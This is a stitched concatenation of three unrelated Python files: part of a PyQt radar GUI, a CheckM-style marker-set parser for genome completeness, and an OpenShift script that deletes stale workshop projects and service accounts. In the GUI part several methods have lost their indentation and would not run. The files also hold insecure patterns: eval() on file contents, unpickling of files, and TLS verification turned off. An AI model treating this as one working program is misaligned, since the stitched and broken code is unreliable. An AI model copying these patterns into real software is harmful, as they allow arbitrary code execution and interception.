            except AttributeError:
                pass
        last_config = {
            "sensor_config_dumps": sensor_config_dumps,
            "processing_config_dumps": processing_config_dumps,
            "host": self.textboxes["host"].text(),
            "sweep_buffer": self.textboxes["sweep_buffer"].text(),
            "interface": self.interface_dd.currentIndex(),
            "port": self.ports_dd.currentIndex(),
            "service_settings": service_params,
            "override_baudrate": self.override_baudrate,
        }
        if not self.under_test:
            np.save(self.LAST_CONF_FILENAME, last_config, allow_pickle=True)
            if self.get_gui_state("ml_mode"):
                try:
                    last_ml_config = {
                        "feature_list": self.feature_select.get_feature_list(),
                        "frame_settings": self.feature_sidepanel.get_frame_settings(),
                        "model_layers": self.model_select.get_layer_list(
                            include_inactive_layers=True
                        ),
                        "last_folder": self.feature_sidepanel.last_folder,
                    }
                except Exception:
                    # Best effort: skip saving ML settings if they can't be read.
                    pass
                else:
                    np.save(self.LAST_ML_CONF_FILENAME, last_ml_config, allow_pickle=True)
        try:
            self.client.disconnect()
        except Exception:
            pass
        self.close()
def get_sensor_config(self):
module_info = self.current_module_info
if module_info.module is None:
return None
module_label = module_info.label
config = self.module_label_to_sensor_config_map[module_label]
if len(self.get_sensors()):
config.sensor = self.get_sensors()
else:
config.sensor = [1]
self.set_sensors([1])
return config
def get_processing_config(self, module_label=None):
if module_label is None:
module_info = self.current_module_info
else:
module_info = MODULE_LABEL_TO_MODULE_INFO_MAP[module_label]
if module_info.module is None:
return None
module_label = module_info.label
return self.module_label_to_processing_config_map[module_label]
def get_default_processing_config(self, module_label=None):
if module_label is not None:
module_info = MODULE_LABEL_TO_MODULE_INFO_MAP[module_label]
else:
module_info = self.current_module_info
module = module_info.module
if module is None or not hasattr(module, "get_processing_config"):
return {}
return module.get_processing_config()
@property
def in_supported_mode(self):
try:
return self.get_sensor_config().mode in self.client.supported_modes
except (AttributeError, TypeError):
return None
class Threaded_Scan(QtCore.QThread):
    """Worker thread running a measurement session.

    Streams data from a live client or replays a loaded file, forwarding
    results and errors to the GUI through the sig_scan signal as
    (message_type, message, data) tuples.
    """

    sig_scan = pyqtSignal(str, str, object)

    def __init__(self, params, parent=None):
        QtCore.QThread.__init__(self, parent)
        self.client = parent.client
        self.radar = parent.radar
        self.sensor_config = params["sensor_config"]
        self.params = params
        self.data = parent.data
        self.parent = parent
        self.running = True
        self.finished.connect(self.stop_thread)

    def stop_thread(self):
        self.quit()

    def run(self):
        """Thread entry point: stream from the client or replay from file."""
        if self.params["data_source"] == "stream":
            record = None
            try:
                session_info = self.client.setup_session(self.sensor_config)
                self.emit("session_info", "", session_info)
                self.radar.prepare_processing(self, self.params, session_info)
                self.client.start_session()
            except clients.base.SessionSetupError:
                self.running = False
                self.emit("session_setup_error", "")
            except Exception as e:
                traceback.print_exc()
                self.emit(
                    "client_error",
                    "Failed to setup streaming!\n" "{}".format(self.format_error(e)),
                )
                self.running = False
            try:
                # Main acquisition loop; runs until receive("stop", ...) flips
                # self.running or the client raises.
                while self.running:
                    info, sweep = self.client.get_next()
                    self.emit("sweep_info", "", info)
                    _, record = self.radar.process(sweep, info)
            except Exception as e:
                traceback.print_exc()
                msg = "Failed to communicate with server!\n{}".format(self.format_error(e))
                self.emit("client_error", msg)
            try:
                self.client.stop_session()
            except Exception:
                pass
            if record is not None and len(record.data) > 0:
                self.emit("scan_data", "", record)
        elif self.params["data_source"] == "file":
            self.emit("session_info", "ok", self.data.session_info)
            try:
                self.radar.prepare_processing(self, self.params, self.data.session_info)
                self.radar.process_saved_data(self.data, self)
            except Exception as e:
                traceback.print_exc()
                error = self.format_error(e)
                self.emit("processing_error", "Error while replaying data:<br>" + error)
        else:
            # Bug fix: this class has no self.mode attribute, so the original
            # raised AttributeError here; report the unknown source instead.
            self.emit("error", "Unknown mode %s!" % self.params["data_source"])
        self.emit("scan_done", "", "")

    def receive(self, message_type, message, data=None):
        """Handle control messages sent from the GUI thread."""
        if message_type == "stop":
            if self.running:
                self.running = False
                self.radar.abort_processing()
        elif message_type == "update_feature_extraction":
            self.radar.update_feature_extraction(message, data)
        elif message_type == "update_feature_list":
            self.radar.update_feature_list(data)
        else:
            print("Scan thread received unknown signal: {}".format(message_type))

    def emit(self, message_type, message, data=None):
        """Emit a (type, message, data) tuple on sig_scan."""
        self.sig_scan.emit(message_type, message, data)

    def format_error(self, e):
        """Format the active exception with type, file, and line for display."""
        exc_type, exc_obj, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        err = "{}\n{}\n{}\n{}".format(exc_type, fname, exc_tb.tb_lineno, e)
        return err
def sigint_handler(gui):
    """Handle Ctrl-C: close the GUI, guarded by a watchdog thread that
    force-exits the process if the close sequence hangs.

    The watchdog is armed before closing and disarmed (event set) once
    the GUI has shut down cleanly.
    """
    done = threading.Event()
    guard = threading.Thread(target=watchdog, args=(done,))
    guard.start()
    gui.closeEvent()
    done.set()  # shutdown finished in time; stand the watchdog down
    guard.join()
def watchdog(event):
    """Force-exit the interpreter unless *event* is set within one second.

    Used as a safety net during shutdown: if the clean close path stalls,
    os._exit(1) terminates the process immediately (no cleanup handlers).
    """
    if not event.wait(1):
        print("\nforcing exit...")
        os._exit(1)
if __name__ == "__main__":
    # Refuse to start when the client library is outdated -- presumably
    # checks the vendor lib version; confirm in lib_version_up_to_date().
    if lib_version_up_to_date():
        utils.config_logging(level=logging.INFO)
        # Enable warnings to be printed to the log, e.g. DeprecationWarning
        warnings.simplefilter("module")
        app = QApplication(sys.argv)
        ex = GUI()
        # Route Ctrl-C to a graceful GUI shutdown (with force-exit watchdog).
        signal.signal(signal.SIGINT, lambda *_: sigint_handler(ex))
        # Makes sure the signal is caught
        # (a periodic no-op timer returns control from the Qt event loop to
        # the Python interpreter so the signal handler can run).
        timer = QtCore.QTimer()
        timer.timeout.connect(lambda: None)
        timer.start(200)
        sys.exit(app.exec_())
|
markerSets.py | ###############################################################################
#
# markerSet.py - Calculate and process marker sets.
#
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
import os
import sys
import logging
import uuid
import tempfile
import shutil
import multiprocessing as mp
import cPickle as pickle
import gzip
from checkm.defaultValues import DefaultValues
from checkm.hmmer import HMMERRunner
from checkm.hmmerModelParser import HmmModelParser
from checkm.util.pfam import PFAM
class BinMarkerSets():
    """A collection of one or more marker sets associated with a bin."""
    # type of marker set
    TAXONOMIC_MARKER_SET = 1
    TREE_MARKER_SET = 2
    HMM_MODELS_SET = 3
    def __init__(self, binId, markerSetType):
        """
        binId : identifier of the bin these marker sets describe
        markerSetType : one of TAXONOMIC_MARKER_SET, TREE_MARKER_SET or
            HMM_MODELS_SET; controls how selectedMarkerSet() resolves
        """
        self.logger = logging.getLogger()
        self.markerSets = []
        self.binId = binId
        self.markerSetType = markerSetType
        # 'Linage' (sic) spelling kept as-is; renaming would break any
        # external readers of this attribute.
        self.selectedLinageSpecificMarkerSet = None
    def numMarkerSets(self):
        """Number of marker sets associated with bin."""
        return len(self.markerSets)
    def addMarkerSet(self, markerSet):
        """Add marker set to bin."""
        self.markerSets.append(markerSet)
    def markerSetIter(self):
        """Generator function for iterating over marker sets."""
        for markerSet in self.markerSets:
            yield markerSet
    def getMarkerGenes(self):
        """Get marker genes from all marker sets."""
        markerGenes = set()
        for ms in self.markerSets:
            markerGenes.update(ms.getMarkerGenes())
        return markerGenes
    def mostSpecificMarkerSet(self):
        # Marker sets are assumed ordered most- to least-specific, so the
        # first entry is the most specific -- TODO confirm the ordering
        # guarantee at the call sites that populate markerSets.
        return self.markerSets[0]
    def treeMarkerSet(self):
        # placeholder; intentionally does nothing
        pass
    def selectedMarkerSet(self):
        """Return the 'selected' marker set for this bin."""
        if self.markerSetType == self.TAXONOMIC_MARKER_SET:
            return self.mostSpecificMarkerSet()
        elif self.markerSetType == self.TREE_MARKER_SET:
            # Set via setLineageSpecificSelectedMarkerSet(); may still be
            # None if that method was never called.
            return self.selectedLinageSpecificMarkerSet
        else:
            # there should be a single marker set associate with this bin
            if len(self.markerSets) == 1:
                return self.markerSets[0]
            self.logger.error(' [Error] Expect a single marker set to be associated with each bin.')
            sys.exit()
    def setLineageSpecificSelectedMarkerSet(self, selectedMarkerSetMap):
        """Resolve and store the lineage-specific marker set to use.

        selectedMarkerSetMap maps a marker set UID to the UID of the set
        that should be used in its place; the map is followed (possibly
        over several hops) until a UID present in this bin is found.
        """
        uid = self.mostSpecificMarkerSet().UID
        selectedId = selectedMarkerSetMap[uid]
        self.selectedLinageSpecificMarkerSet = None
        while not self.selectedLinageSpecificMarkerSet:
            for ms in self.markerSets:
                if ms.UID == selectedId:
                    self.selectedLinageSpecificMarkerSet = ms
                    break
            if not self.selectedLinageSpecificMarkerSet:
                # This is a hack for the reduced tree. Since not all
                # marker sets are in the reduced tree it is possible the
                # selected marker set might not be avaliable. In this case,
                # we should move to the next suitable marker set. Ideally,
                # this could be avoided by just forcing in the selected
                # marker set.
                # NOTE(review): a cycle in selectedMarkerSetMap would make
                # this loop spin forever; a missing key raises KeyError.
                selectedId = selectedMarkerSetMap[selectedId]
            else:
                break
        if self.selectedLinageSpecificMarkerSet == None:
            # something has gone wrong
            self.logger.error(' [Error] Failed to set a selected lineage-specific marker set.')
            sys.exit()
    def removeMarkers(self, markersToRemove):
        """Remove specified markers from all marker sets."""
        for markerSet in self.markerSets:
            curMarkerSet = markerSet.markerSet
            newMarkerSet = []
            for ms in curMarkerSet:
                # set difference; drop co-located sets that become empty
                newMS = ms - markersToRemove
                if len(newMS) != 0:
                    newMarkerSet.append(newMS)
            markerSet.markerSet = newMarkerSet
    def write(self, fout):
        """Write marker set to file."""
        # Format: binId, number of sets, then one repr() field per set,
        # all tab-separated on a single line (the inverse of read()).
        fout.write(self.binId)
        fout.write('\t' + str(len(self.markerSets)))
        for ms in self.markerSets:
            fout.write('\t' + str(ms))
        fout.write('\n')
    def read(self, line):
        """Construct bin marker set data from line."""
        # Each marker set occupies 4 tab-separated fields: UID, lineage
        # string, genome count, and a repr of the co-located gene sets.
        lineSplit = line.split('\t')
        numMarkerSets = int(lineSplit[1])
        for i in xrange(0, numMarkerSets):
            uid = lineSplit[i * 4 + 2]
            lineageStr = lineSplit[i * 4 + 3]
            numGenomes = int(lineSplit[i * 4 + 4])
            # SECURITY NOTE(review): eval() executes arbitrary code from the
            # marker set file; only load trusted files here.
            markerSet = eval(lineSplit[i * 4 + 5])
            self.markerSets.append(MarkerSet(uid, lineageStr, numGenomes, markerSet))
class MarkerSet():
    """A collection of marker genes organized into co-located sets."""
    def __init__(self, UID, lineageStr, numGenomes, markerSet):
        self.logger = logging.getLogger()
        self.UID = UID                # unique ID of marker set
        self.lineageStr = lineageStr  # taxonomic string associated with marker set
        self.numGenomes = numGenomes  # number of genomes used to calculate marker set
        self.markerSet = markerSet    # marker genes organized into co-located sets
    def __repr__(self):
        # Tab-separated form consumed by BinMarkerSets.write()/read().
        return '\t'.join([str(self.UID), self.lineageStr,
                          str(self.numGenomes), str(self.markerSet)])
    def size(self):
        """Number of marker genes and marker gene sets."""
        numMarkerGenes = sum(len(colocatedSet) for colocatedSet in self.markerSet)
        return numMarkerGenes, len(self.markerSet)
    def numMarkers(self):
        """Number of marker genes."""
        numGenes, _ = self.size()
        return numGenes
    def numSets(self):
        """Number of marker sets."""
        return len(self.markerSet)
    def getMarkerGenes(self):
        """Get marker genes within marker set."""
        markerGenes = set()
        for colocatedSet in self.markerSet:
            markerGenes |= set(colocatedSet)
        return markerGenes
    def removeMarkers(self, markersToRemove):
        """Remove specified markers from marker sets."""
        pruned = []
        for colocatedSet in self.markerSet:
            remaining = colocatedSet - markersToRemove
            if len(remaining) != 0:
                pruned.append(remaining)
        self.markerSet = pruned
    def genomeCheck(self, hits, bIndividualMarkers):
        """Calculate genome completeness and contamination.

        hits : dict mapping marker gene -> list of hits for that gene
        bIndividualMarkers : if True, treat every gene independently;
            otherwise average over the co-located sets
        Returns (percent completeness, percent contamination).
        """
        if bIndividualMarkers:
            present = 0
            multiCopyCount = 0
            for marker in self.getMarkerGenes():
                if marker in hits:
                    present += 1
                    # every hit beyond the first counts as contamination
                    multiCopyCount += (len(hits[marker]) - 1)
            percComp = 100 * float(present) / self.numMarkers()
            percCont = 100 * float(multiCopyCount) / self.numMarkers()
        else:
            comp = 0.0
            cont = 0.0
            for colocatedSet in self.markerSet:
                present = 0
                multiCopy = 0
                for marker in colocatedSet:
                    count = len(hits.get(marker, []))
                    if count >= 1:
                        present += 1
                        multiCopy += (count - 1)
                # each co-located set contributes its own fraction
                comp += float(present) / len(colocatedSet)
                cont += float(multiCopy) / len(colocatedSet)
            percComp = 100 * comp / len(self.markerSet)
            percCont = 100 * cont / len(self.markerSet)
        return percComp, percCont
class MarkerSetParser():
    """Parse marker set file."""
    def __init__(self, threads=1):
        self.logger = logging.getLogger()
        self.numThreads = threads  # worker processes used for HMM extraction
    def getMarkerSets(self, outDir, binIds, markerFile, excludeMarkersFile=None):
        """Determine marker set for each bin.

        binIds : iterable of bin identifiers
        markerFile : taxonomic marker set file, lineage marker set file,
            or raw HMM model file (type auto-detected from its header)
        excludeMarkersFile : optional file listing marker accessions to drop
        Returns a dict mapping each bin id to its BinMarkerSets.
        """
        # determine type of marker set file
        markerFileType = self.markerFileType(markerFile)
        # get marker set for each bin
        binIdToBinMarkerSets = {}
        if markerFileType == BinMarkerSets.TAXONOMIC_MARKER_SET:
            # one shared marker set object for all bins
            binMarkerSets = self.parseTaxonomicMarkerSetFile(markerFile)
            for binId in binIds:
                binIdToBinMarkerSets[binId] = binMarkerSets
        elif markerFileType == BinMarkerSets.TREE_MARKER_SET:
            binIdToBinMarkerSets = self.parseLineageMarkerSetFile(markerFile)
        else:
            # raw HMM file: every model accession goes into one single
            # co-located set shared by all bins
            markers = [set()]
            modelParser = HmmModelParser(markerFile)
            for model in modelParser.parse():
                markers[0].add(model.acc)
            markerSet = MarkerSet(0, "N/A", -1, markers)
            for binId in binIds:
                binMarkerSets = BinMarkerSets(binId, BinMarkerSets.HMM_MODELS_SET)
                binMarkerSets.addMarkerSet(markerSet)
                binIdToBinMarkerSets[binId] = binMarkerSets
        # remove marker genes specified by user or marker for exclusion
        markersToExclude = set()
        if excludeMarkersFile:
            markersToExclude = self.readExcludeMarkersFile(excludeMarkersFile)
        markersToExclude.update(DefaultValues.MARKERS_TO_EXCLUDE)
        # NOTE(review): iteritems/xrange show this module targets Python 2.
        for binId, binMarkerSet in binIdToBinMarkerSets.iteritems():
            binMarkerSet.removeMarkers(markersToExclude)
        return binIdToBinMarkerSets
    def readExcludeMarkersFile(self, excludeMarkersFile):
        """Parse file specifying markers to exclude."""
        markersToExclude = set()
        for line in open(excludeMarkersFile):
            if line[0] == '#':
                continue  # comment line
            marker = line.strip()
            markersToExclude.add(marker)
        return markersToExclude
    def createHmmModels(self, outDir, binIds, markerFile):
        """Create HMM model for each bins marker set.

        Returns a dict mapping bin id -> HMM models for that bin.
        """
        # determine type of marker set file
        markerFileType = self.markerFileType(markerFile)
        # get HMM file for each bin
        binIdToModels = {}
        if markerFileType == BinMarkerSets.TAXONOMIC_MARKER_SET:
            # all bins share the same taxonomic marker set, so the HMMs
            # only need to be extracted once
            hmmModelFile = self.createHmmModelFile(binIds.keys()[0], markerFile)
            modelParser = HmmModelParser(hmmModelFile)
            models = modelParser.models()
            for binId in binIds:
                binIdToModels[binId] = models
            os.remove(hmmModelFile)
        elif markerFileType == BinMarkerSets.TREE_MARKER_SET:
            binIdToModels = self.__createLineageHmmModels(binIds, markerFile)
        else:
            # the marker file already is an HMM file
            modelParser = HmmModelParser(markerFile)
            models = modelParser.models()
            for binId in binIds:
                binIdToModels[binId] = models
        return binIdToModels
    def createHmmModelFile(self, binId, markerFile):
        """Create HMM file for from a bin's marker set.

        Returns the path to a temporary HMM file; the caller is
        responsible for removing it.
        """
        # determine type of marker set file
        markerFileType = self.markerFileType(markerFile)
        # create HMM file
        hmmModelFile = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
        if markerFileType == BinMarkerSets.TAXONOMIC_MARKER_SET:
            binMarkerSets = self.parseTaxonomicMarkerSetFile(markerFile)
            self.__createMarkerHMMs(binMarkerSets, hmmModelFile, bReportProgress=False)
        elif markerFileType == BinMarkerSets.TREE_MARKER_SET:
            binIdToBinMarkerSets = self.parseLineageMarkerSetFile(markerFile)
            self.__createMarkerHMMs(binIdToBinMarkerSets[binId], hmmModelFile, bReportProgress=False)
        else:
            # already an HMM file; just take a private copy
            shutil.copyfile(markerFile, hmmModelFile)
        return hmmModelFile
    def __createLineageHmmModels(self, binIds, markerFile):
        """Create lineage-specific HMMs for each bin."""
        self.logger.info(' Extracting lineage-specific HMMs with %d threads:' % self.numThreads)
        workerQueue = mp.Queue()
        writerQueue = mp.Queue()
        for binId in binIds:
            workerQueue.put(binId)
        # one None sentinel per worker signals shutdown
        for _ in range(self.numThreads):
            workerQueue.put(None)
        binIdToModels = mp.Manager().dict()
        try:
            calcProc = [mp.Process(target=self.__fetchModelInfo, args=(binIdToModels, markerFile, workerQueue, writerQueue)) for _ in range(self.numThreads)]
            writeProc = mp.Process(target=self.__reportFetchProgress, args=(len(binIds), writerQueue))
            writeProc.start()
            for p in calcProc:
                p.start()
            for p in calcProc:
                p.join()
            writerQueue.put(None)
            writeProc.join()
        except:
            # make sure all processes are terminated
            for p in calcProc:
                p.terminate()
            writeProc.terminate()
        # create a standard dictionary from the managed dictionary
        d = {}
        for binId in binIdToModels.keys():
            d[binId] = binIdToModels[binId]
        return d
    def __fetchModelInfo(self, binIdToModels, markerFile, queueIn, queueOut):
        """Fetch HMM."""
        # Worker process: consume bin ids until the None sentinel arrives.
        while True:
            binId = queueIn.get(block=True, timeout=None)
            if binId == None:
                break
            hmmModelFile = self.createHmmModelFile(binId, markerFile)
            modelParser = HmmModelParser(hmmModelFile)
            binIdToModels[binId] = modelParser.models()
            os.remove(hmmModelFile)
            queueOut.put(binId)
    def __reportFetchProgress(self, numBins, queueIn):
        """Report progress of extracted HMMs."""
        # Progress-writer process; overwrites one stderr line with \r.
        numProcessedBins = 0
        if self.logger.getEffectiveLevel() <= logging.INFO:
            statusStr = ' Finished extracting HMMs for %d of %d (%.2f%%) bins.' % (numProcessedBins, numBins, float(numProcessedBins) * 100 / numBins)
            sys.stderr.write('%s\r' % statusStr)
            sys.stderr.flush()
        while True:
            binId = queueIn.get(block=True, timeout=None)
            if binId == None:
                break  # sentinel from the parent: all workers finished
            if self.logger.getEffectiveLevel() <= logging.INFO:
                numProcessedBins += 1
                statusStr = ' Finished extracting HMMs for %d of %d (%.2f%%) bins.' % (numProcessedBins, numBins, float(numProcessedBins) * 100 / numBins)
                sys.stderr.write('%s\r' % statusStr)
                sys.stderr.flush()
        if self.logger.getEffectiveLevel() <= logging.INFO:
            sys.stderr.write('\n')
    def markerFileType(self, markerFile):
        """Determine type of marker file."""
        # the first line of the file identifies its format
        with open(markerFile, 'r') as f:
            header = f.readline()
        if DefaultValues.TAXON_MARKER_FILE_HEADER in header:
            return BinMarkerSets.TAXONOMIC_MARKER_SET
        elif DefaultValues.LINEAGE_MARKER_FILE_HEADER in header:
            return BinMarkerSets.TREE_MARKER_SET
        elif 'HMMER3' in header:
            return BinMarkerSets.HMM_MODELS_SET
        else:
            self.logger.error('Unrecognized file type: ' + markerFile)
            sys.exit()
    def __createMarkerHMMs(self, binMarkerSet, outputFile, bReportProgress=True):
        """Create HMM file for markers."""
        # get list of marker genes
        markerGenes = binMarkerSet.getMarkerGenes()
        # get all genes from the same clan as any marker gene
        pfam = PFAM(DefaultValues.PFAM_CLAN_FILE)
        genesInSameClan = pfam.genesInSameClan(markerGenes)
        # extract marker genes along with all genes from the same clan
        allMarkers = markerGenes | genesInSameClan
        if bReportProgress:
            self.logger.info(" There are %d genes in the marker set and %d genes from the same PFAM clan." % (len(markerGenes), len(genesInSameClan)))
        # create file with all model accession numbers
        keyFile = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
        fout = open(keyFile, 'w')
        for modelAcc in allMarkers:
            fout.write(modelAcc + '\n')
        fout.close()
        # fetch specified models
        HF = HMMERRunner(mode='fetch')
        HF.fetch(DefaultValues.HMM_MODELS, keyFile, outputFile, bKeyFile=True)
        # index the HMM file
        if os.path.exists(outputFile + '.ssi'):
            os.remove(outputFile + '.ssi')
        HF.index(outputFile)
        # remove key file
        os.remove(keyFile)
    def parseTaxonomicMarkerSetFile(self, markerSetFile):
        """Parse marker set from a taxonomic-specific marker set file."""
        with open(markerSetFile) as f:
            f.readline()  # skip header
            # the file is expected to contain a single data line
            binLine = f.readline()
            taxonId = binLine.split('\t')[0]
            binMarkerSets = BinMarkerSets(taxonId, BinMarkerSets.TAXONOMIC_MARKER_SET)
            binMarkerSets.read(binLine)
        return binMarkerSets
    def parseLineageMarkerSetFile(self, markerSetFile):
        """Parse marker sets from a lineage-specific marker set file."""
        # read all marker sets
        binIdToBinMarkerSets = {}
        with open(markerSetFile) as f:
            f.readline()  # skip header
            for line in f:
                lineSplit = line.split('\t')
                binId = lineSplit[0]
                binMarkerSets = BinMarkerSets(binId, BinMarkerSets.TREE_MARKER_SET)
                binMarkerSets.read(line)
                # determine selected marker set
                # NOTE(review): the selection map is re-read from disk for
                # every line; it could be hoisted out of the loop.
                selectedMarkerSetMap = self.parseSelectedMarkerSetMap()
                binMarkerSets.setLineageSpecificSelectedMarkerSet(selectedMarkerSetMap)
                binIdToBinMarkerSets[binId] = binMarkerSets
        return binIdToBinMarkerSets
    def parseSelectedMarkerSetMap(self):
        """Parse the map from marker set UID to the UID of the marker set
        selected in its place (read from DefaultValues.SELECTED_MARKER_SETS)."""
        selectedMarkerSetMap = {}
        for line in open(DefaultValues.SELECTED_MARKER_SETS):
            lineSplit = line.split('\t')
            internalID = lineSplit[0]
            selectedID = lineSplit[1].rstrip()
            selectedMarkerSetMap[internalID] = selectedID
        return selectedMarkerSetMap
    def writeBinModels(self, binIdToModels, filename):
        """Save HMM model info for each bin to file."""
        self.logger.info(' Saving HMM info to file.')
        with gzip.open(filename, 'wb') as output:
            pickle.dump(binIdToModels, output, pickle.HIGHEST_PROTOCOL)
    def loadBinModels(self, filename):
        """Read HMM model info for each bin from file."""
        self.logger.info(' Reading HMM info from file.')
        # SECURITY NOTE(review): unpickling executes arbitrary code; only
        # load trusted files here.
        with gzip.open(filename, 'rb') as f:
            binIdToModels = pickle.load(f)
        return binIdToModels
|
delete-projects.py | import threading
import time
import os
from collections import namedtuple
from kubernetes.client.rest import ApiException
from kubernetes.client.configuration import Configuration
from kubernetes.config.incluster_config import load_incluster_config
from kubernetes.client.api_client import ApiClient
from openshift.dynamic import DynamicClient, Resource
# Location where the pod's service account credentials are mounted.
service_account_path = '/var/run/secrets/kubernetes.io/serviceaccount'
# Namespace this spawner is deployed into (read from the mounted secret).
# The original read the same file twice, once via service_account_path and
# once via a duplicated hard-coded path; a single read suffices.
with open(os.path.join(service_account_path, 'namespace')) as fp:
    namespace = fp.read().strip()
# Deployment identity. WORKSHOP_NAME defaults to 'homeroom'; when
# APPLICATION_NAME is not supplied it falls back to the workshop name.
# Bug fix: the original had the fallback inverted
# (`if not application_name: workshop_name = application_name`), which
# left application_name as None and produced a 'None-spawner' service
# account name.
workshop_name = os.environ.get('WORKSHOP_NAME')
application_name = os.environ.get('APPLICATION_NAME')
if not workshop_name:
    workshop_name = 'homeroom'
if not application_name:
    application_name = workshop_name
service_account_name = '%s-spawner' % application_name
full_service_account_name = 'system:serviceaccount:%s:%s' % (namespace,
        service_account_name)
# Configure the Kubernetes client from the in-cluster credentials and
# disable TLS verification (warnings silenced).
load_incluster_config()
import urllib3
urllib3.disable_warnings()
instance = Configuration()
instance.verify_ssl = False
Configuration.set_default(instance)
api_client = DynamicClient(ApiClient())
# Resource handles used throughout the reaper.
pod_resource = api_client.resources.get(
    api_version='v1', kind='Pod')
service_account_resource = api_client.resources.get(
    api_version='v1', kind='ServiceAccount')
namespace_resource = api_client.resources.get(
    api_version='v1', kind='Namespace')
role_binding_resource = api_client.resources.get(
    api_version='rbac.authorization.k8s.io/v1', kind='RoleBinding')
# project_cache: project -> timestamp its pod was last seen.
# account_cache: account name -> set of live projects owned by it.
# orphan_cache: account name -> timestamp it was first seen without projects.
project_cache = {}
account_cache = {}
orphan_cache = {}
Namespace = namedtuple('Namespace', ['name', 'account', 'pod'])
def get_projects():
    """Return a Namespace tuple for every project created by this
    spawner deployment.

    A project is ours when its spawner/* annotations match this
    deployment's service account, namespace and application name.
    Failures are logged and a possibly empty list is returned.
    """
    details = []
    try:
        response = namespace_resource.get(namespace=namespace)
        for project in response.items:
            annotations = project.metadata.annotations
            if not annotations:
                continue
            owned = (annotations['spawner/requestor'] == full_service_account_name
                    and annotations['spawner/namespace'] == namespace
                    and annotations['spawner/deployment'] == application_name)
            if owned:
                details.append(Namespace(project.metadata.name,
                        annotations['spawner/account'],
                        annotations['spawner/session']))
    except Exception as e:
        print('ERROR: failed to list projects:', e)
    return details
def get_accounts():
    """Return the service accounts created for users of this application
    (label app == application_name and a truthy user label).

    Failures are logged and a possibly empty list is returned.
    """
    matches = []
    try:
        response = service_account_resource.get(namespace=namespace)
        for account in response.items:
            labels = account.metadata.labels
            # short-circuit: unlabeled accounts can never match
            app_label = labels and labels['app']
            if app_label == application_name and labels['user']:
                matches.append(account)
    except Exception as e:
        print('ERROR: failed to list accounts:', e)
    return matches
def pod_exists(name):
    """Return True when the named pod exists in our namespace.

    A 404 means the pod is simply gone and is not an error; any other
    failure is logged. All failure paths report the pod as absent.
    """
    try:
        pod_resource.get(namespace=namespace, name=name)
    except ApiException as e:
        # 404 is the expected "not found" answer; anything else is odd.
        if e.status != 404:
            print('ERROR: failed to lookup pod %s:' % name, e)
        return False
    except Exception as e:
        print('ERROR: failed to lookup pod %s:' % name, e)
        return False
    return True
def namespaced_resources():
    """Yield every namespaced resource type known to the API server.

    Walks all discovered API groups and versions, yielding concrete
    Resource objects that are namespaced; groups that cannot be queried
    are skipped silently.

    Bug fix: the original reassigned the ``version`` loop variable inside
    the per-kind loop (``version = '%s/%s' % (domain, version)``), so for
    groups with a domain every kind after the first was looked up with a
    doubled prefix (e.g. 'apps/apps/v1') and silently dropped by the
    except clause. The fully-qualified api_version is now computed once
    per group/version.
    """
    api_groups = api_client.resources.parse_api_groups()
    for api in api_groups.values():
        for domain, items in api.items():
            for version, group in items.items():
                # Fully-qualified API version, e.g. 'apps/v1' or plain 'v1'.
                api_version = '%s/%s' % (domain, version) if domain else version
                try:
                    for kind in group.resources:
                        resource = api_client.resources.get(api_version=api_version, kind=kind)
                        if type(resource) == Resource and resource.namespaced:
                            yield resource
                except Exception:
                    # Some discovery entries cannot be retrieved; skip them.
                    pass
def purge_project(name):
    """Unwedge a project stuck in Terminating by stripping finalizers
    from every namespaced resource that is still being deleted inside it."""
    for resource_type in namespaced_resources():
        try:
            objects = resource_type.get(namespace=name)
            for obj in objects.items:
                if obj.metadata.deletionTimestamp and obj.metadata.finalizers:
                    # Since the project is stuck in terminating, we
                    # remove any finalizers which might be blocking
                    # it. Finalizers can be left around with nothing
                    # to remove them because there is no gaurantee
                    # what order resources will be deleted when a
                    # project is deleted. Thus an application, for
                    # example an operator which would remove the
                    # finalizer when a CRD is deleted, might get
                    # deleted before the objects with the finalizer,
                    # and so the objects can't then be deleted.
                    body = {
                        'kind': obj.kind,
                        'apiVersion': obj.apiVersion,
                        'metadata': {
                            'name': obj.metadata.name,
                            'finalizers': None
                        }
                    }
                    print('WARNING: deleting finalizers on resource: %s' % body)
                    try:
                        # merge-patch with finalizers: None clears the list
                        resource_type.patch(namespace=name, body=body,
                                content_type='application/merge-patch+json')
                    except ApiException as e:
                        print('ERROR: failed to delete finalizers: %s' % body, e)
                    except Exception as e:
                        print('ERROR: failed to delete finalizers: %s' % body, e)
        except ApiException as e:
            # 403/404/405: resource type not listable in this project; fine.
            if e.status not in (403, 404, 405):
                print('ERROR: failed to query resources %s' % resource_type, e)
        except Exception as e:
            print('ERROR: failed to query resources %s' % resource_type, e)
            pass
def delete_project(name):
    """Delete the named project (namespace), handling the usual races.

    A 409 means the project is already terminating, in which case any
    blocking finalizers are purged; a 404 means it is already gone.
    Other failures are logged.
    """
    try:
        namespace_resource.delete(name=name)
    except ApiException as e:
        if e.status == 409:
            # Already terminating; clear finalizers that may block it.
            print('WARNING: project %s is still terminating' % name)
            purge_project(name)
        elif e.status == 404:
            print('INFO: project %s already deleted' % name)
        else:
            print('ERROR: failed to delete project %s:' % name, e)
    except Exception as e:
        print('ERROR: failed to delete project %s:' % name, e)
    else:
        print('INFO: deleted project %s' % name)
def delete_account(name):
    """Delete the named service account; 404 (already gone) is benign."""
    try:
        service_account_resource.delete(namespace=namespace, name=name)
    except ApiException as e:
        if e.status == 404:
            print('INFO: account %s already deleted' % name)
        else:
            print('ERROR: failed to delete account %s:' % name, e)
    except Exception as e:
        print('ERROR: failed to delete account %s:' % name, e)
    else:
        print('INFO: deleted account %s' % name)
def purge():
    """One reaper pass: delete projects whose session pod has been gone
    for more than 90 seconds, then delete service accounts that no
    longer own any cached project.

    Relies on the module-level caches:
      project_cache: project -> timestamp its pod was last seen
      account_cache: account name -> set of live projects owned by it
      orphan_cache:  account name -> timestamp first seen without projects
    """
    now = time.time()
    projects = get_projects()
    if projects:
